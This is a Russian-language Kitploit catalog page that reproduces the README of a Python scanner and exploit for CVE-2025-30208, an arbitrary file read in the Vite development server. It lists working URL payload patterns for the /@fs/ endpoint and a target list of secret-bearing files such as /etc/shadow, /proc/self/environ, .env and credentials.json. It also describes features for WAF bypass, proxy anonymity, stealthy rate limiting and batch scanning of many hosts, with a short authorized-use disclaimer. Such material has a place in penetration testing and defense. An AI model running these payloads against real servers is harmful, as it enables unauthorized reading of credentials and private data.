Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда). | Kitploit
Инструменты/GitHubGitHub/th-secforge/cve-2025-30208
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда).

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Сканер уязвимости CVE-2025-30208 Vite (произвольное чтение файлов)

Python License Security Status Modular

Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня

Профессиональный инструмент тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов в Vite

🚀 Быстрый старт • 📋 Возможности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность


📖 Обзор

Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 в серверах разработки Vite. Уязвимость позволяет осуществлять произвольное чтение файлов через конечные точки файловой системы Vite, что потенциально открывает доступ к конфиденциальным файлам конфигурации, исходному коду и системной информации.

🎯 Что делает этот инструмент

  • Обнаруживает уязвимые экземпляры Vite в сетях
  • Безопасно эксплуатирует уязвимость произвольного чтения файлов
  • Находит конфиденциальные файлы и данные конфигурации
  • Формирует отчёты о результатах в нескольких форматах (HTML, JSON, консоль)
  • Управляет сеансами сканирования и конфигурациями
  • Корректно обрабатывает ошибки с помощью механизмов автоматических повторных попыток

🏗️ Модульная архитектура

Теперь инструмент имеет модульную архитектуру для улучшения сопровождаемости и расширяемости:

  • CVE-2025-30208.py — основное приложение сканера
  • payloads.py — продвинутые эксплойт-пейлоады (60+ вариаций)
  • sensitive_files.py — обширная база конфиденциальных файлов (200+ файлов)
  • html_template.py — улучшенный HTML-шаблон отчётов в хакерском стиле

🚀 Быстрый старт

Предварительные требования

root@kitploit:~
pip3 install -r requirements.txt

Базовое использование

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Возможности

🔍 Основное обнаружение уязвимостей

  • 60+ продвинутых пейлоадов: комплексные техники эксплуатации для максимального обнаружения
  • Умное обнаружение: интеллектуальный анализ ответов для исключения ложных срабатываний
  • Проверка в реальном времени: непрерывная валидация ответов цели
  • Комплексное тестирование: проверка всех известных уязвимых конечных точек

🛡️ Расширенные функции безопасности

  • Поддержка прокси: настройка HTTP/HTTPS-прокси для анонимности
  • Пользовательские заголовки: обход WAF/IPS с помощью пользовательских HTTP-заголовков
  • Ограничение скорости: настраиваемые задержки для избежания обнаружения
  • Управление сеансами: сохранение и восстановление сеансов сканирования
  • Проверка ввода: комплексная валидация параметров

🔧 Расширенные возможности

  • Пакетное сканирование: многопоточное сканирование нескольких целей
  • Поиск конфиденциальных файлов: автоматическое обнаружение 200+ конфиденциальных файлов
  • Проверка связности: тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Восстановление после ошибок: автоматические повторные попытки с экспоненциальной задержкой
  • Комплексное журналирование: подробные журналы с временными метками

📊 Отчёты и вывод

  • 🎨 Улучшенные HTML-отчёты: красивые отчёты об уязвимостях в хакерском стиле с анимациями
  • Экспорт в JSON: структурированные данные для дальнейшего анализа
  • Вывод в консоль: цветная индикация в реальном времени
  • Журнальные файлы: подробные аудит-трассы
  • Интерактивный веб-интерфейс: встроенный веб-сервер для просмотра отчётов

🔧 Руководство по использованию

1. Базовая конфигурация

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Тестирование уязвимости

root@kitploit:~
CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Пакетное сканирование

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Поиск конфиденциальных файлов

root@kitploit:~
CVE-2025-30208 > scan

5. Расширенная конфигурация

root@kitploit:~
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Улучшенные HTML-отчёты

root@kitploit:~
# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Справочник команд


⚙️ Параметры конфигурации


🎨 Расширенная система пейлоадов

Сканер теперь использует 60+ различных вариаций пейлоадов, организованных в payloads.py:

Основные пейлоады @fs

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Расширенные вариации параметров

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Специфические вариации Vite

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Вариации модульных систем

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Альтернативные конечные точки

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Расширенный поиск конфиденциальных файлов

Инструмент теперь проверяет 200+ конфиденциальных файлов, организованных в sensitive_files.py:

🖥️ Системные файлы (Linux/Unix)

  • /etc/passwd — информация об учётных записях пользователей
  • /etc/shadow — зашифрованные данные паролей
  • /etc/services — сетевые службы
  • /etc/hosts — сопоставление имён хостов
  • /etc/fstab — таблица файловых систем
  • /etc/ssh/sshd_config — конфигурация SSH-сервера
  • /etc/crontab — системные задачи cron
  • /etc/sudoers — конфигурация sudo

📊 Информация о процессах

  • /proc/version — версия ядра
  • /proc/cpuinfo — информация о процессоре
  • /proc/meminfo — информация о памяти
  • /proc/self/environ — окружение процесса
  • /proc/self/cmdline — командная строка процесса
  • /proc/net/tcp — TCP-соединения
  • /proc/net/udp — UDP-соединения

⚙️ Конфигурация приложений

  • .env — переменные окружения
  • .env.local — локальное окружение
  • .env.production — производственное окружение
  • config.json — конфигурация приложения
  • settings.json — настройки приложения
  • application.properties — конфигурация Spring
  • application.yml — YAML-конфигурация
  • database.yml — конфигурация базы данных
  • secrets.json — управление секретами

📦 Файлы Node.js / JavaScript

  • package.json — зависимости Node.js
  • package-lock.json — зафиксированные зависимости
  • yarn.lock — файл блокировки Yarn
  • vite.config.js — конфигурация Vite
  • vite.config.ts — TypeScript-конфигурация Vite
  • tsconfig.json — конфигурация TypeScript
  • webpack.config.js — конфигурация Webpack
  • next.config.js — конфигурация Next.js
  • nuxt.config.js — конфигурация Nuxt.js
  • angular.json — конфигурация Angular
  • vue.config.js — конфигурация Vue.js
  • rollup.config.js — конфигурация Rollup
  • eslint.config.js — конфигурация ESLint

🔧 Файлы Git

  • .git/config — конфигурация Git
  • .gitignore — правила игнорирования Git
  • .gitattributes — атрибуты Git
  • .gitmodules — подмодули Git
  • .git/HEAD — текущая ветка
  • .git/logs/HEAD — журналы Git
  • .git/refs/heads/master — ветка master
  • .git/refs/heads/main — ветка main

📚 Документационные файлы

  • README.md — документация проекта
  • CHANGELOG.md — журнал изменений
  • LICENSE — информация о лицензии
  • CONTRIBUTING.md — руководство по участию
  • AUTHORS — информация об авторах
  • TODO.md — список задач
  • ROADMAP.md — дорожная карта разработки

🐳 Файлы Docker

  • Dockerfile — конфигурация Docker
  • docker-compose.yml — Docker Compose
  • docker-compose.override.yml — конфигурация переопределения
  • .dockerignore — правила игнорирования Docker
  • docker-compose.prod.yml — производственная конфигурация
  • docker-compose.dev.yml — конфигурация разработки

🌐 Конфигурация веб-сервера

  • nginx.conf — конфигурация Nginx
  • apache2.conf — конфигурация Apache
  • httpd.conf — конфигурация HTTP-демона
  • .htaccess — контроль доступа Apache
  • web.config — конфигурация IIS
  • robots.txt — директивы для поисковых систем
  • sitemap.xml — структура сайта
  • manifest.json — манифест веб-приложения
  • sw.js — сервис-воркер
  • firebase.json — конфигурация Firebase
  • firebase.rules — правила безопасности Firebase

🪟 Файлы Windows

  • boot.ini — конфигурация загрузки
  • autoexec.bat — сценарий автозапуска
  • system.ini — системная конфигурация
  • win.ini — конфигурация Windows
  • Users — пользовательские каталоги
  • Windows — системные файлы
  • Program Files — каталоги приложений

🍎 Файлы macOS

  • System — системные файлы
  • Library — файлы библиотек
  • Applications — файлы приложений
  • private/etc/hosts — файл hosts
  • private/etc/passwd — учётные записи пользователей

🗄️ Файлы баз данных

  • database.db — база данных SQLite
  • database.sqlite — база данных SQLite
  • data.db — база данных
  • dump.sql — дамп базы данных
  • schema.sql — схема базы данных
  • migrations — миграции базы данных

📝 Журнальные файлы

  • logs — каталог журналов
  • error.log — журналы ошибок
  • access.log — журналы доступа
  • app.log — журналы приложения
  • debug.log — отладочные журналы
  • combined.log — объединённые журналы

💾 Резервные копии

  • backup — каталог резервных копий
  • backup.sql — резервная копия базы данных
  • backup.zip — сжатая резервная копия
  • dump — дамп данных
  • export — экспорт данных

🔒 Безопасность и аутентификация

  • auth.json — конфигурация аутентификации
  • credentials.json — хранилище учётных данных
  • keys.json — управление ключами
  • tokens.json — хранилище токенов
  • jwt.json — конфигурация JWT
  • oauth.json — конфигурация OAuth

🔌 Файлы API и сервисов

  • api.json — конфигурация API
  • swagger.json — документация API
  • openapi.json — спецификация OpenAPI
  • graphql.json — конфигурация GraphQL
  • schema.json — схема API

☁️ Облако и развёртывание

  • cloudformation.yml — AWS CloudFormation
  • serverless.yml — serverless-конфигурация
  • terraform.tf — конфигурация Terraform
  • kubernetes.yml — конфигурация Kubernetes
  • k8s.yml — конфигурация Kubernetes

📊 Мониторинг и аналитика

  • analytics.json — конфигурация аналитики
  • monitoring.json — настройка мониторинга
  • metrics.json — конфигурация метрик
  • telemetry.json — данные телеметрии

🎨 Улучшенные HTML-отчёты

Инструмент теперь генерирует красивые HTML-отчёты в хакерском стиле со следующими возможностями:

✨ Визуальные возможности

  • Фон в стиле «Матрицы» с анимированными падающими символами
  • Градиентные анимации и светящиеся эффекты
  • Интерактивные элементы с эффектами наведения
  • Адаптивный дизайн для всех устройств
  • Тёмная тема, оптимизированная для специалистов по безопасности

📊 Интерактивная статистика

  • Счётчики в реальном времени для общего числа утечек и объёма раскрытых данных
  • Индикаторы серьёзности с цветовой кодировкой
  • Функция копирования для каждой утечки
  • Предпросмотр содержимого с размером и количеством строк
  • Разворачиваемые разделы для детального анализа

🔧 Технические возможности

  • Интеграция Google Fonts (JetBrains Mono, Orbitron)
  • CSS-анимации и переходы
  • Интерактивность на JavaScript для улучшенного UX
  • Мобильная адаптивность дизайна
  • Кроссбраузерная совместимость

🌐 Интеграция с веб-сервером

  • Встроенный HTTP-сервер для просмотра отчётов
  • Автоматическое открытие браузера
  • Варианты настройки порта
  • Простые команды запуска/остановки

🛡️ Обработка ошибок и восстановление

Механизм автоматических повторных попыток

  • 3 попытки повтора: неудачные запросы автоматически повторяются
  • Экспоненциальная задержка: увеличивающаяся задержка между повторными попытками
  • Умная классификация ошибок: различная обработка разных типов ошибок
  • Корректное восстановление: инструмент продолжает работу после ошибок

Категории ошибок

  • NetworkError: проблемы соединения, тайм-аута или прокси
  • ConfigurationError: недопустимые настройки и параметры
  • ValidationError: недопустимые входные параметры
  • ScannerError: общие ошибки сканера

Функции валидации

  • Проверка ввода в реальном времени: все параметры проверяются перед использованием
  • Проверка конфигурации: полная валидация перед сканированием
  • Проверка связности: тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Проверка прокси: проверка формата URL прокси

📁 Выходные файлы


📝 Затронутые версии

🚨 Уязвимые версии

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Незатронутые версии

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Безопасность и этичное использование

⚠️ Важные замечания по безопасности

  • Только авторизованное тестирование: используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Ответственное раскрытие: сообщайте об уязвимостях владельцам систем
  • Ограничение скорости: используйте подходящие задержки, чтобы не перегружать цели
  • Использование прокси: рассмотрите возможность использования прокси для анонимности, когда это уместно
  • Соблюдение законодательства: обеспечьте соответствие местным законам и нормативным требованиям

🔒 Лучшие практики

  • Всегда получайте письменное разрешение перед тестированием
  • Используйте только в контролируемых средах
  • Документируйте все действия по тестированию
  • Соблюдайте ограничения скорости и системные ресурсы
  • Ответственно сообщайте о находках

🚀 Примеры расширенного использования

Пример 1: Полное сетевое сканирование

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Пример 2: Скрытое сканирование через прокси

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Пример 3: Рабочий процесс расширенной отчётности

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Пример 4: Поиск конфиденциальных файлов

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Структура проекта

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Main scanner application
├── payloads.py                # Advanced exploitation payloads (60+)
├── sensitive_files.py         # Sensitive file database (200+)
├── html_template.py           # Enhanced HTML reporting template
├── README.md                  # This documentation
├── requirements.txt           # Python dependencies
├── logs/                      # Log files directory
├── data_leak.html            # Generated HTML reports
├── data_leak.json            # Generated JSON reports
└── session.json              # Saved session configurations

🤝 Вклад в проект

Мы приветствуем вклад в улучшение этого инструмента:

  1. Форкните репозиторий
  2. Создайте ветку функции
  3. Внесите свои изменения
  4. Тщательно протестируйте
  5. Отправьте pull request

Направления для вклада

  • Новые вариации пейлоадов в payloads.py
  • Дополнительные шаблоны конфиденциальных файлов в sensitive_files.py
  • Улучшенные HTML-шаблоны в html_template.py
  • Улучшенная обработка ошибок
  • Оптимизация производительности
  • Улучшение документации

📄 Лицензия

Этот проект лицензирован только для образовательных целей и авторизованного тестирования безопасности.

⚠️ Правовое предупреждение: Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за любое неправомерное использование этого инструмента.


👨‍💻 Автор

ThemeHackers

GitHub

Исследователь безопасности и специалист по тестированию на проникновение


⭐ Если этот инструмент вам помог, пожалуйста, поставьте ему звезду! ⭐

Создано с ❤️ для сообщества специалистов по безопасности

Скачать инструмент
КомандаОписаниеПример
set <option> <value>Установить параметры конфигурацииset RHOST 192.168.1.100
show optionsПоказать текущие настройкиshow options
editИнтерактивный редактор параметровedit
run / exploitЗапустить тест на уязвимостьrun
batchПакетное сканирование нескольких целейbatch
scanПоиск конфиденциальных файловscan
pullЭкспортировать результаты в HTML/JSONpull
web [on|off|port]Веб-сервер для HTML-отчётовweb 8080
saveСохранить конфигурацию сеансаsave
loadЗагрузить конфигурацию сеансаload
testПроверить связь с цельюtest
validateПроверить текущую конфигурациюvalidate
verboseПереключить подробный режимverbose
proxyНастроить параметры проксиproxy
headersУстановить пользовательские HTTP-заголовкиheaders
rateНастроить ограничение скоростиrate
logПоказать информацию журналаlog
help / ?Показать справкуhelp
exit / quitВыйти из инструментаexit
ПараметрОписаниеПо умолчаниюПроверка
RHOSTЦелевой хост / IP-адрес-Проверка имени хоста / IP
RPORTНомер порта цели-Диапазон портов (1-65535)
FILEPATHПуть к файлу для проверкиetc/passwdПроверка пути
PROXYURL HTTP/HTTPS-прокси-Проверка формата URL
VERBOSEВключить подробный выводfalseПроверка логического значения
RATE_LIMITЗадержка между запросами (секунды)0.3Числовая проверка
THREADSКоличество потоков для пакетного сканирования5Проверка целочисленного значения
TIMEOUTТайм-аут запроса (секунды)5Проверка целочисленного значения
CUSTOM_HEADERSПользовательские HTTP-заголовки (JSON){}Проверка формата JSON
  • prettier.config.js — конфигурация Prettier
  • jest.config.js — конфигурация Jest
  • babel.config.js — конфигурация Babel
  • tailwind.config.js — конфигурация Tailwind CSS
  • ФайлОписаниеФормат
    data_leak.htmlУлучшенный HTML-отчёт об уязвимости в хакерском стилеHTML
    data_leak.jsonСтруктурированный экспорт в JSONJSON
    sensitive_files_discovery.jsonОбнаруженные конфиденциальные файлыJSON
    session.jsonСохранённая конфигурация сеансаJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logПодробные журналы аудитаТекст